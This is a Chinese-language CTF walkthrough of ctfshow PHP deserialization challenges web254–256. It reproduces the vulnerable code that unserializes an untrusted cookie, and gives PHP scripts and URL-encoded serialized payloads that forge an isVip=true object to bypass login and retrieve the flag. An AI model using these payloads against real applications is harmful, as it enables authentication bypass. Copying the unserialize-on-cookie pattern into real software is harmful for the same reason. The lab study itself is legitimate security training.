ctfshow--反序列化WP
刷题随笔
web254
题目
直接传参,没啥好说的
web255
题目
<?php error_reporting(0); // Turn off all PHP error/warning output for this script, so runtime failures below are not shown.
// Print this file's own syntax-highlighted source in the response.
highlight_file(__FILE__);
// Load flag.php; presumably it defines $flag, which vipOneKeyGetFlag() reads via `global $flag` (file not shown here).
include('flag.php');
/**
 * User model from the web255 challenge.
 *
 * All three properties are public and the class has no validation hook, so an
 * instance produced by unserialize() carries whatever username, password and
 * isVip values were present in the serialized input.
 */
class ctfShowUser
{
    // Credentials the object compares against in login(); placeholder defaults.
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';

    // Privilege flag; the only gate in front of the flag output.
    public $isVip = false;

    /**
     * Report the VIP flag stored on this object.
     */
    public function checkVip()
    {
        return $this->isVip;
    }

    /**
     * Strictly compare the supplied credentials with the ones stored on this object.
     *
     * @param mixed $u candidate user name
     * @param mixed $p candidate password
     * @return bool true only when both values are identical (===) to the stored ones
     */
    public function login($u, $p)
    {
        if ($this->username !== $u) {
            return false;
        }

        return $this->password === $p;
    }

    /**
     * Echo the global $flag for VIP objects, otherwise echo a refusal message.
     */
    public function vipOneKeyGetFlag()
    {
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }

        // $flag is a global defined outside this class.
        global $flag;
        echo "your flag is " . $flag;
    }
}
// Request handling for the challenge page.
// A missing query parameter yields null here, so the isset() check below fails.
$username = $_GET['username'];
$password = $_GET['password'];

if (isset($username, $password)) {
    // SECURITY: $_COOKIE['user'] is client-controlled and goes straight into
    // unserialize(). The object's username/password/isVip are therefore whatever
    // the client serialized, so login() and checkVip() compare client data with
    // client data and authenticate nothing. In real code keep this state
    // server-side (session) or use a signed/JSON format; if unserialize() cannot
    // be avoided, restrict it with the `allowed_classes` option.
    // NOTE: the result is not checked; a missing or malformed cookie makes
    // unserialize() return false and the method call below fail, which
    // error_reporting(0) hides.
    $user = unserialize($_COOKIE['user']);

    if (!$user->login($username, $password)) {
        echo "no vip,no flag";
    } elseif ($user->checkVip()) {
        $user->vipOneKeyGetFlag();
    }
}
构造序列串
<?php
/**
 * Local stand-in that shares only its name with the challenge class.
 *
 * serialize() records the class name and the property names/values, not the
 * class definition, which is why the server-side defaults give no protection
 * for fields that are restored from client-supplied serialized data.
 */
class ctfShowUser
{
    // Sole property; ends up as the only field in the serialized output.
    public $isVip;

    /**
     * Set the VIP flag on construction.
     */
    public function __construct()
    {
        $this->isVip = true;
    }
}
// Instantiate the stand-in class and print its serialized form, unencoded.
$a = new ctfShowUser();
print serialize($a);
得到序列串O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
通过设置cookie传递后并没有发现flag
于是在本地试一下,看传参后 $_COOKIE 变量会变成什么
猜测应该是 Cookie 的 user 参数中的分号导致后面的序列串被分隔(Cookie 头本身用分号分隔各个键值对)
对序列串做 URL 编码后再放入 Cookie 即可(PHP 解析 Cookie 值时会自动做 URL 解码)
web256
题目
<?php
// Turn off all PHP error/warning output for this script, so runtime failures below are not shown.
error_reporting(0);
// Print this file's own syntax-highlighted source in the response.
highlight_file(__FILE__);
// Load flag.php; presumably it defines $flag, which vipOneKeyGetFlag() reads via `global $flag` (file not shown here).
include('flag.php');
/**
 * User model from the web256 challenge.
 *
 * Same shape as the web255 class, with one extra condition before the flag is
 * printed: the stored username and password must differ. Every value involved
 * is a public property, so an instance produced by unserialize() carries
 * whatever the serialized input specified and the extra condition adds no
 * protection on its own.
 */
class ctfShowUser
{
    // Credentials the object compares against in login(); placeholder defaults.
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';

    // Privilege flag checked before any flag output.
    public $isVip = false;

    /**
     * Report the VIP flag stored on this object.
     */
    public function checkVip()
    {
        return $this->isVip;
    }

    /**
     * Strictly compare the supplied credentials with the ones stored on this object.
     *
     * @param mixed $u candidate user name
     * @param mixed $p candidate password
     * @return bool true only when both values are identical (===) to the stored ones
     */
    public function login($u, $p)
    {
        if ($this->username !== $u) {
            return false;
        }

        return $this->password === $p;
    }

    /**
     * Echo the global $flag for VIP objects whose username and password differ.
     *
     * Non-VIP objects get a refusal message; VIP objects with identical
     * username and password produce no output at all.
     */
    public function vipOneKeyGetFlag()
    {
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }

        // $flag is a global defined outside this class.
        global $flag;
        if ($this->username === $this->password) {
            return;
        }

        echo "your flag is " . $flag;
    }
}
// Request handling for the challenge page.
// A missing query parameter yields null here, so the isset() check below fails.
$username = $_GET['username'];
$password = $_GET['password'];

if (isset($username, $password)) {
    // SECURITY: the cookie value is client-controlled and is deserialized
    // directly. Every property later consulted by login(), checkVip() and
    // vipOneKeyGetFlag() is restored from that input, so none of those checks
    // establishes identity or privilege. Real code should keep such state
    // server-side or in a signed/JSON format, and restrict unserialize() with
    // the `allowed_classes` option where it cannot be removed.
    // NOTE: the result is not checked; a missing or malformed cookie makes
    // unserialize() return false and the method call below fail.
    $user = unserialize($_COOKIE['user']);

    if (!$user->login($username, $password)) {
        echo "no vip,no flag";
    } elseif ($user->checkVip()) {
        $user->vipOneKeyGetFlag();
    }
}
构造序列化串
<?php
/**
 * Local stand-in that shares only its name with the challenge class.
 *
 * Properties are serialized in declaration order (username, then isVip); the
 * password property is not declared here, so it does not appear in the output.
 */
class ctfShowUser
{
    public $username;
    public $isVip;

    /**
     * Populate both declared properties with fixed values.
     */
    public function __construct()
    {
        $this->username = "aaa";
        $this->isVip = true;
    }
}
// Instantiate the stand-in class and print its serialized form, URL-encoded.
$a = new ctfShowUser();
print urlencode(serialize($a));
?username=aaa&password=xxxxxx
O:11:"ctfShowUser":2:{s:8:"username";s:3:"aaa";s:5:"isVip";b:1;}
URL编码一下